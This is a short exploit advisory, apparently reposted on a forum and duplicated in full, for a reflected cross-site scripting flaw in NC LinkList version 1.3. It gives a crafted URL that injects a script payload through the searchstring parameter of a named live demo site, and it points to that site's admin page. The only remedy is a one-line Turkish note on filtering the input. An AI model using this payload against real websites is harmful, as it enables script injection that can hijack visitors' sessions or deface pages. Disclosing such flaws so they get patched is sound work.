endLesS
Webmaster
[#] Exploit Title: NC LinkList Version 1.3 ~ XSS Vulnerability
[#] Author: Err0r
[#] Date: 01.08.2011
[#] E-mail: err0riletisim[MENTION=140012]Gmail[/MENTION].com
[#] Category: Web App.
[#] Note : Warning.
[#] DEMO:http://www.php-linkverzeichnis.de/demo/index.php?action=show&view=search
[#] Price : ab 49,00
[#] Vuln Type: Reflected XSS
[!] Fix : GET \\ ile searchstring Değişkenine atanan değer veya text Filtreden geçirildikten sonra ekrana yazılmalı / aktarılmalı . .
##################
[*] Exploit :
# alert(document.domain)http://www.php-linkverzeichnis.de/demo/index.php?action=show&view=search&searchstring=>**********alert(document.domain)</script>
# http://php-linkverzeichnis.de/demo/admin/
#########################
[#] Author: Err0r
[#] Date: 01.08.2011
[#] E-mail: err0riletisim[MENTION=140012]Gmail[/MENTION].com
[#] Category: Web App.
[#] Note : Warning.
[#] DEMO:http://www.php-linkverzeichnis.de/demo/index.php?action=show&view=search
[#] Price : ab 49,00
[#] Vuln Type: Reflected XSS
[!] Fix : GET \\ ile searchstring Değişkenine atanan değer veya text Filtreden geçirildikten sonra ekrana yazılmalı / aktarılmalı . .
##################
[*] Exploit :
# alert(document.domain)http://www.php-linkverzeichnis.de/demo/index.php?action=show&view=search&searchstring=>**********alert(document.domain)</script>
# http://php-linkverzeichnis.de/demo/admin/
#########################